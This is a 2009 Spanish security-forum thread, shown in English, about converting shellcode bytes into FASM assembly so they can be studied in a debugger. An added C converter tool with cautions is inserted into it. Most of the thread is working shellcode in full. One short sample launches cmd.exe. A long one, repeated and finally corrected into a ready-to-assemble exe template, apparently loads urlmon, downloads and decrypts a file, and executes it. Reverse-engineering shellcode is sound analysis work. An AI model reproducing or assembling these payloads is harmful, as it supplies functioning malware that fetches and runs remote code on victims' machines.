elhacker.net forum > Seguridad Informática > Bugs y Exploits (Moderators: Anon, berz3k)
Topic: Shellcode/opcode to ASM? (Read 644 times)
shimpei (Messages: 50)
Shellcode/opcode to ASM?
« on: 15 December 2009, 02:46 »

Could someone comment on practical methods for turning a shellcode into asm so it can be analysed? ;D

DSR! //"With Love or with Hate, but always with Violence"
web http://www.SoporteDSR.ar.gd

YST (Messages: 940) - "I'm you"
Re: Shellcode/opcode to ASM?
« Reply #1 on: 15 December 2009, 03:22 »

I'm not sure I understood you correctly, but... you convert the shellcode into hexadecimal that an assembler understands, i.e. something like, for example:

ShellCode:
Code
char scode[]= // By Rojodos
  // byte 9 is 0xC6 (mov byte [ebp-8],'c'); the posted copy had 0xE6 here, a typo that breaks the mov-byte pattern
  {0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xC6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,
   0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,
   0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4};
 


For FASM:
Code
; same bytes as FASM data; FASM accepts the 0x prefix for hex literals
db 0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xC6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D
db 0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78
db 0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4

and then in that same fasm, on Windows for example, you do a
Code
include "win32ax.inc"
.code
start:
; the bytes sit at the entry point, so launching the exe executes the shellcode:
; open it in a debugger instead of double-clicking it
db 0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xC6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D
db 0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78
db 0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4
.end start
 


Then you open the generated exe with a debugger, for example olly debug :P



I taught Kayser to use objects in ASM
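The conversion YST describes (escape string, then a 0xNN byte list, then `db` lines inside the win32ax.inc template, then the exe opened in a debugger) is mechanical, and the step that bit this thread later on is the hand transcription. What follows is an added example, not code from the thread, from Rojodos or from FASM: a small C program that reads the byte list in either form (`\x64\xA1...` or `0x64,0xA1,...`), validates every token, reports the offset of a malformed one, and prints the FASM source. The file name shellcode2fasm.c, the 4096-byte limit and the rule "only the byte list, not the surrounding `char scode[]= {...};`" are my choices.

```c
/* shellcode2fasm.c -- added example, not code from the thread.
 *
 * Reads a shellcode byte list from stdin, written either as C escapes
 * ("\x64\xA1\x18...") or as hex literals ("0x64,0xA1,0x18,..."), turns it
 * into raw bytes while validating every token, and prints a FASM source
 * file laid out like the template in the thread
 * (include "win32ax.inc" / .code / start: / db ... / .end start).
 * Paste only the byte list, not the C declaration around it.
 *
 * The strict token check is the point: a missing comma ("0x1C0xAD") or a
 * dropped '0' ("x2B") is reported with its offset instead of being
 * silently turned into the wrong bytes or left for the assembler to reject.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower((unsigned char)c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Characters allowed between tokens: whitespace, commas, quotes, braces. */
static int is_sep(int c)
{
    return c == ' ' || c == '\t' || c == '\n' || c == '\r' || c == ',' ||
           c == '"' || c == '\'' || c == '{' || c == '}' || c == ';';
}

/* Parse text into bytes. A token is \xNN or 0xNN with exactly two hex
 * digits and must not run straight into another hex digit.
 * Returns the byte count; -1 on a malformed token, with the offset of the
 * offending character stored in *err_off; -2 if more than cap bytes appear. */
long parse_shellcode(const char *s, unsigned char *out, size_t cap, size_t *err_off)
{
    size_t i = 0, n = 0;
    while (s[i] != '\0') {
        if (is_sep((unsigned char)s[i])) { i++; continue; }
        /* token prefix is "\x" or "0x" (case-insensitive x) */
        if ((s[i] == '\\' || s[i] == '0') && (s[i + 1] == 'x' || s[i + 1] == 'X')) {
            int hi = hexval((unsigned char)s[i + 2]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)s[i + 3]);
            if (lo < 0) { *err_off = i + (hi < 0 ? 2 : 3); return -1; }   /* too few digits */
            if (hexval((unsigned char)s[i + 4]) >= 0) { *err_off = i + 4; return -1; } /* e.g. 0x1C0xAD */
            if (n == cap) return -2;
            out[n++] = (unsigned char)(hi * 16 + lo);
            i += 4;
            continue;
        }
        *err_off = i;   /* anything else, e.g. the "x2B" with its 0 dropped */
        return -1;
    }
    return (long)n;
}

/* Render bytes as FASM "db" lines, 16 bytes per line. Behaves like snprintf:
 * returns the full output length even when buf is NULL or cap is too small. */
size_t fasm_db_lines(const unsigned char *b, size_t n, char *buf, size_t cap)
{
    size_t len = 0;
    for (size_t i = 0; i < n; i++) {
        const char *lead = (i % 16 == 0) ? "db " : "";
        const char *tail = (i % 16 == 15 || i + 1 == n) ? "\n" : ",";
        int w = snprintf(len < cap ? buf + len : NULL, len < cap ? cap - len : 0,
                         "%s0x%02X%s", lead, b[i], tail);
        if (w < 0) return 0;
        len += (size_t)w;
    }
    return len;
}

int main(void)
{
    static char text[1 << 16];
    unsigned char code[4096];            /* size limit: my choice */
    size_t off = 0, got = fread(text, 1, sizeof text - 1, stdin);
    text[got] = '\0';

    long n = parse_shellcode(text, code, sizeof code, &off);
    if (n == -2) { fprintf(stderr, "input exceeds %zu bytes\n", sizeof code); return 1; }
    if (n < 0)  { fprintf(stderr, "bad token at offset %zu: \"%.12s\"\n", off, text + off); return 1; }
    if (n == 0) { fprintf(stderr, "no bytes found\n"); return 1; }

    size_t need = fasm_db_lines(code, (size_t)n, NULL, 0) + 1;
    char *db = malloc(need);
    if (db == NULL) return 1;
    fasm_db_lines(code, (size_t)n, db, need);

    /* same layout as the win32ax.inc template used in this thread */
    printf("include \"win32ax.inc\"\n.code\nstart:\n%s.end start\n", db);
    fprintf(stderr, "%ld bytes\n", n);
    free(db);
    return 0;
}
```

Usage: `shellcode2fasm < bytes.txt > sc.asm`, then `fasm sc.asm` and open the resulting exe in OllyDbg. Because `.end start` makes the first byte the entry point, the exe executes the shellcode if it is launched; step through it in the debugger (on a throwaway VM for anything like the second shellcode in this thread, which loads libraries and writes files), never run it directly. If all you want is the listing, the raw bytes can also be fed to a disassembler that accepts flat binaries, for instance `ndisasm -b32` from the NASM package (assuming you have it installed), without building an exe at all.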
shimpei (Messages: 50)
Re: Shellcode/opcode to ASM?
« Reply #2 on: 15 December 2009, 03:52 »

Ah, so I'd just have to replace the \ with 0 to be able to compile it thanks to win32ax.inc
Quote:
\x64\xA1\x18\x00\x00\x00\x8B\x40\x30\x8B\x40\x54\x8B\x40\x04\x8B
\x40\x04\x8B\x40\x04\x0D\x20\x00\x20\x00\x3D\x7C\x00\x77\x00\x74
\x01\xC3\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C
\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A
\x4E\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xC7\x45\x10\x6E\x2E\x65\x78\xC7
\x45\x14\xFF\x01\x00\x00\xC7\x45\x00\x00\x00\x00\x00\xEB\x4F\x5A
\x52\x83\xEA\x56\x89\x55\x18\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78
\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF
\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB
\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48
\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D
\x1C\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B
\xF7\xF2\xAE\x4F\x8B\x45\x10\xAB\x66\x98\x66\xAB\x33\xC0\xB8\x61
\x64\x00\x00\x50\x68\x54\x68\x72\x65\x35\x24\x1C\x69\x74\x50\x54
\x53\xB8\xAA\xFC\x0D\x7C\xFF\x55\x18\x83\xC4\x0C\x50\xB0\x6C\x8A
\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E
\x4E\x0E\xEC\xFF\x55\x18\x83\xC4\x0C\x93\x50\x33\xC0\x50\x50\x56
\x8B\x55\x18\x03\x55\x14\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x18
\x5B\x83\x7D\x00\x01\x0F\x85\x9E\x00\x00\x00\x6A\x00\x68\x80\x00
\x00\x00\x6A\x03\x6A\x00\x6A\x03\x68\x00\x00\x00\xC0\x56\xB8\xA5
\x17\x00\x7C\xFF\x55\x18\x89\x45\x04\x6A\x04\x68\x00\x10\x00\x00
\x68\x00\x00\x08\x00\x6A\x00\xB8\x54\xCA\xAF\x91\xFF\x55\x18\x89
\x45\x0C\x50\x6A\x00\x8D\x4D\x08\x51\x68\x00\x00\x08\x00\x50\xFF
\x75\x04\xB8\x16\x65\xFA\x10\xFF\x55\x18\x5F\x8B\x17\x83\xC7\x04
\x8B\x4D\x08\x83\xE9\x04\xE8\xA7\x00\x00\x00\x6A\x00\x6A\x00\x6A
\x00\xFF\x75\x04\xB8\xAC\x08\xDA\x76\xFF\x55\x18\x6A\x00\x8D\x4D
\x08\x51\xFF\x75\x08\xFF\x75\x0C\x83\x04\x24\x04\xFF\x75\x04\xB8
\x1F\x79\x0A\xE8\xFF\x55\x18\xFF\x75\x04\xB8\xFB\x97\xFD\x0F\xFF
\x55\x18\xC7\x45\x00\x02\x00\x00\x00\x57\x56\xB8\x98\xFE\x8A\x0E
\xFF\x55\x18\xEB\x2A\x18\x2A\xF9\xB7\xD2\x77\xB3\x01\x45\x8A\x92
\xB7\xAD\x50\x5D\xE4\x67\xF5\xE6\xC7\x1A\xBF\xAB\x1E\x10\x42\x76
\xA2\xA1\x54\x63\x09\x7B\x89\xB0\xF4\x97\x4E\x73\x93\x3F\xF1\x83
\x7D\x00\x02\x74\x60\xC7\x45\x00\x01\x00\x00\x00\xC7\x45\x10\x79
\x2E\x65\x78\xC7\x45\x14\x72\x01\x00\x00\x8B\x7D\x18\x03\x7D\x14
\xB9\x26\x00\x00\x00\x8B\x57\xFC\xE8\x05\x00\x00\x00\xE9\x7C\xFE
\xFF\xFF\x33\xC0\x8A\x07\xD2\xC8\x32\xC1\xF6\xD0\x32\xC5\x32\xC2
\x32\xC6\xD2\xC0\x02\xC1\x02\xC5\x02\xC2\x02\xC6\xD2\xC8\x2A\xC1
\x2A\xC5\xF6\xD0\x2A\xC2\x2A\xC6\xD2\xC0\xD3\xC2\x0F\xCA\x88\x07
\x47\x49\x75\xCE\xC3\xC3

Now I'll download fasm and try it, thanks a lot YST! ;D

YST (Messages: 940) - "I'm you"
Re: Shellcode/opcode to ASM?
« Reply #3 on: 15 December 2009, 04:28 »

If I didn't drop any characters, it would be something like this

Code
db 0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x54,0x8B,0x40,0x04,0x8B,0x40,0x04,0x8B,0x40,0x04,0x0D,0x20,0x00,0x20,0x00,0x3D,0x7C,0x00,0x77,0x00,0x74,0x01,0xC3,0x33,0xC0,0x64,0x8B,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C0xAD,0x8B,0x58,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x58,0x3C,0x6A,0x4E,0x5A,0xD1,0xE2,x2B,0xE2,0x8B,0xEC,0xC7,0x45,0x10,0x6E,0x2E,0x65,0x78,0xC7,0x45,0x14,0xFF,0x01,0x00,0x00,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0xEB,0x4F,0x5A,0x52,0x83,0xEA,0x56,0x89,0x55,0x18,0x56,0x57,0x8B,0x73,0x3C,0x8B,0x74,0x33,0x78,0x03,0xF3,0x56,0x8B,0x76,0x20,0x03,0xF3,0x33,0xC9,0x49,0x50,0x41,0xAD,0x33,0xFF,0x36,0x0F,0xBE,0x14,0x03,0x38,0xF2,0x74,0x08,0xC1,0xCF,0x0D,0x03,0xFA,0x40,0xEB,0xEF,0x58,0x3B,0xF8,0x75,0xE5,0x5E,0x8B,0x46,0x24,0x03,0xC3,0x66,0x8B,0x0C,0x48,0x8B,0x56,0x1C,0x03,0xD3,0x8B,0x04,0x8A,0x03,0xC3,0x5F,0x5E,0x50,0xC3,0x8D,0x7D,0x1C,0x57,0x52,0xB8,0x33,0xCA,0x8A,0x5B,0xE8,0xA2,0xFF,0xFF,0xFF,0x32,0xC0,0x8B,0xF7,0xF2,0xAE,0x4F,0x8B,0x45,0x10,0xAB,0x66,0x98,0x66,0xAB,0x33,0xC0,0xB8,0x61,0x64,0x00,0x00,0x50,0x68,0x54,0x68,0x72,0x65,0x35,0x24,0x1C,0x69,0x74,0x50,0x54,0x53,0xB8,0xAA,0xFC,0x0D,0x7C,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x50,0xB0,0x6C,0x8A,0xE0,0x98,0x50,0x68,0x6F,0x6E,0x2E,0x64,0x68,0x75,0x72,0x6C,0x6D,0x54,0xB8,0x8E,0x4E,0x0E,0xEC,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x93,0x50,0x33,0xC0,0x50,0x50,0x56,0x8B,0x55,0x18,0x03,0x55,0x14,0x52,0x50,0xB8,0x36,0x1A,0x2F,0x70,0xFF,0x55,0x18,0x5B,0x83,0x7D,0x00,0x01,0x0F,0x85,0x9E,0x00,0x00,0x00,0x6A,0x00,0x68,0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x56,0xB8,0xA5,0x17,0x00,0x7C,0xFF,0x55,0x18,0x89,0x45,0x04,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x08,0x00,0x6A,0x00,0xB8,0x54,0xCA,0xAF,0x91,0xFF,0x55,0x18,0x89,0x45,0x0C,0x50,0x6A,0x00,0x8D,0x4D,0x08,0x51,0x68,0x00,0x00,0x08,0x00,0x50,0xFF,0x75,0x04,0xB8,0x16,0x65,0xFA,0x10,0xFF,0x55,0x18,0x5F,0x8B,0x17,0x83,0xC7,0x04,0x8B,0x4D,0x08,0x83,0xE9,0x04,0xE8,0xA7,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A
,0x00,0xFF,0x75,0x04,0xB8,0xAC,0x08,0xDA,0x76,0xFF,0x55,0x18,0x6A,0x00,0x8D,0x4D,0x08,0x51,0xFF,0x75,0x08,0xFF,0x75,0x0C,0x83,0x04,0x24,0x04,0xFF,0x75,0x04,0xB8,0x1F,0x79,0x0A,0xE8,0xFF,0x55,0x18,0xFF,0x75,0x04,0xB8,0xFB,0x97,0xFD,0x0F,0xFF,0x55,0x18,0xC7,0x45,0x00,0x02,0x00,0x00,0x00,0x57,0x56,0xB8,0x98,0xFE,0x8A,0x0E,0xFF,0x55,0x18,0xEB,0x2A,0x18,0x2A,0xF9,0xB7,0xD2,0x77,0xB3,0x01,0x45,0x8A,0x92,0xB7,0xAD,0x50,0x5D,0xE4,0x67,0xF5,0xE6,0xC7,0x1A,0xBF,0xAB,0x1E,0x10,0x42,0x76,0xA2,0xA1,0x54,0x63,0x09,0x7B,0x89,0xB0,0xF4,0x97,0x4E,0x73,0x93,0x3F,0xF1,0x83,0x7D,0x00,0x02,0x74,0x60,0xC7,0x45,0x00,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x79,0x2E,0x65,0x78,0xC7,0x45,0x14,0x72,0x01,0x00,0x00,0x8B,0x7D,0x18,0x03,0x7D,0x14,0xB9,0x26,0x00,0x00,0x00,0x8B,0x57,0xFC,0xE8,0x05,0x00,0x00,0x00,0xE9,0x7C,0xFE,0xFF,0xFF,0x33,0xC0,0x8A,0x07,0xD2,0xC8,0x32,0xC1,0xF6,0xD0,0x32,0xC5,0x32,0xC2,0x32,0xC6,0xD2,0xC0,0x02,0xC1,0x02,0xC5,0x02,0xC2,0x02,0xC6,0xD2,0xC8,0x2A,0xC1,0x2A,0xC5,0xF6,0xD0,0x2A,0xC2,0x2A,0xC6,0xD2,0xC0,0xD3,0xC2,0x0F,0xCA,0x88,0x07,0x47,0x49,0x75,0xCE,0xC3,
shimpei (Messages: 50)
Re: Shellcode/opcode to ASM?
« Reply #4 on: 17 December 2009, 17:51 »

I tried to compile that shellcode and it threw an error :-X
Anyway, thanks YST

YST (Messages: 940) - "I'm you"
Re: Shellcode/opcode to ASM?
« Reply #5 on: 17 December 2009, 20:15 »

See, I did drop some characters :xD

Code
include "win32ax.inc"
.code
start:
; byte list transcribed from the quoted \x form; the closing 0xC3 restored (the quote ends in \xC3\xC3)
db 0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x54,0x8B,0x40,0x04,0x8B,0x40,0x04,0x8B,0x40,0x04,0x0D,0x20,0x00,0x20,0x00,0x3D,0x7C,0x00,0x77,0x00,0x74,0x01,0xC3,0x33,0xC0,0x64,0x8B,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x58,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x58,0x3C,0x6A,0x4E,0x5A,0xD1,0xE2,0x2B,0xE2,0x8B,0xEC,0xC7,0x45,0x10,0x6E,0x2E,0x65,0x78,0xC7,0x45,0x14,0xFF,0x01,0x00,0x00,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0xEB,0x4F,0x5A,0x52,0x83,0xEA,0x56,0x89,0x55,0x18,0x56,0x57,0x8B,0x73,0x3C,0x8B,0x74,0x33,0x78,0x03,0xF3,0x56,0x8B,0x76,0x20,0x03,0xF3,0x33,0xC9,0x49,0x50,0x41,0xAD,0x33,0xFF,0x36,0x0F,0xBE,0x14,0x03,0x38,0xF2,0x74,0x08,0xC1,0xCF,0x0D,0x03,0xFA,0x40,0xEB,0xEF,0x58,0x3B,0xF8,0x75,0xE5,0x5E,0x8B,0x46,0x24,0x03,0xC3,0x66,0x8B,0x0C,0x48,0x8B,0x56,0x1C,0x03,0xD3,0x8B,0x04,0x8A,0x03,0xC3,0x5F,0x5E,0x50,0xC3,0x8D,0x7D,0x1C,0x57,0x52,0xB8,0x33,0xCA,0x8A,0x5B,0xE8,0xA2,0xFF,0xFF,0xFF,0x32,0xC0,0x8B,0xF7,0xF2,0xAE,0x4F,0x8B,0x45,0x10,0xAB,0x66,0x98,0x66,0xAB,0x33,0xC0,0xB8,0x61,0x64,0x00,0x00,0x50,0x68,0x54,0x68,0x72,0x65,0x35,0x24,0x1C,0x69,0x74,0x50,0x54,0x53,0xB8,0xAA,0xFC,0x0D,0x7C,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x50,0xB0,0x6C,0x8A,0xE0,0x98,0x50,0x68,0x6F,0x6E,0x2E,0x64,0x68,0x75,0x72,0x6C,0x6D,0x54,0xB8,0x8E,0x4E,0x0E,0xEC,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x93,0x50,0x33,0xC0,0x50,0x50,0x56,0x8B,0x55,0x18,0x03,0x55,0x14,0x52,0x50,0xB8,0x36,0x1A,0x2F,0x70,0xFF,0x55,0x18,0x5B,0x83,0x7D,0x00,0x01,0x0F,0x85,0x9E,0x00,0x00,0x00,0x6A,0x00,0x68,0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x56,0xB8,0xA5,0x17,0x00,0x7C,0xFF,0x55,0x18,0x89,0x45,0x04,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x08,0x00,0x6A,0x00,0xB8,0x54,0xCA,0xAF,0x91,0xFF,0x55,0x18,0x89,0x45,0x0C,0x50,0x6A,0x00,0x8D,0x4D,0x08,0x51,0x68,0x00,0x00,0x08,0x00,0x50,0xFF,0x75,0x04,0xB8,0x16,0x65,0xFA,0x10,0xFF,0x55,0x18,0x5F,0x8B,0x17,0x83,0xC7,0x04,0x8B,0x4D,0x08,0x83,0xE9,0x04,0xE8,0xA7,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x75,0x04,0xB8,0xAC,0x08,0xDA,0x76,0xFF,0x55,0x18,0x6A,0x00,0x8D,0x4D,0x08,0x51,0xFF,0x75,0x08,0xFF,0x75,0x0C,0x83,0x04,0x24,0x04,0xFF,0x75,0x04,0xB8,0x1F,0x79,0x0A,0xE8,0xFF,0x55,0x18,0xFF,0x75,0x04,0xB8,0xFB,0x97,0xFD,0x0F,0xFF,0x55,0x18,0xC7,0x45,0x00,0x02,0x00,0x00,0x00,0x57,0x56,0xB8,0x98,0xFE,0x8A,0x0E,0xFF,0x55,0x18,0xEB,0x2A,0x18,0x2A,0xF9,0xB7,0xD2,0x77,0xB3,0x01,0x45,0x8A,0x92,0xB7,0xAD,0x50,0x5D,0xE4,0x67,0xF5,0xE6,0xC7,0x1A,0xBF,0xAB,0x1E,0x10,0x42,0x76,0xA2,0xA1,0x54,0x63,0x09,0x7B,0x89,0xB0,0xF4,0x97,0x4E,0x73,0x93,0x3F,0xF1,0x83,0x7D,0x00,0x02,0x74,0x60,0xC7,0x45,0x00,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x79,0x2E,0x65,0x78,0xC7,0x45,0x14,0x72,0x01,0x00,0x00,0x8B,0x7D,0x18,0x03,0x7D,0x14,0xB9,0x26,0x00,0x00,0x00,0x8B,0x57,0xFC,0xE8,0x05,0x00,0x00,0x00,0xE9,0x7C,0xFE,0xFF,0xFF,0x33,0xC0,0x8A,0x07,0xD2,0xC8,0x32,0xC1,0xF6,0xD0,0x32,0xC5,0x32,0xC2,0x32,0xC6,0xD2,0xC0,0x02,0xC1,0x02,0xC5,0x02,0xC2,0x02,0xC6,0xD2,0xC8,0x2A,0xC1,0x2A,0xC5,0xF6,0xD0,0x2A,0xC2,0x2A,0xC6,0xD2,0xC0,0xD3,0xC2,0x0F,0xCA,0x88,0x07,0x47,0x49,0x75,0xCE,0xC3,0xC3
.end start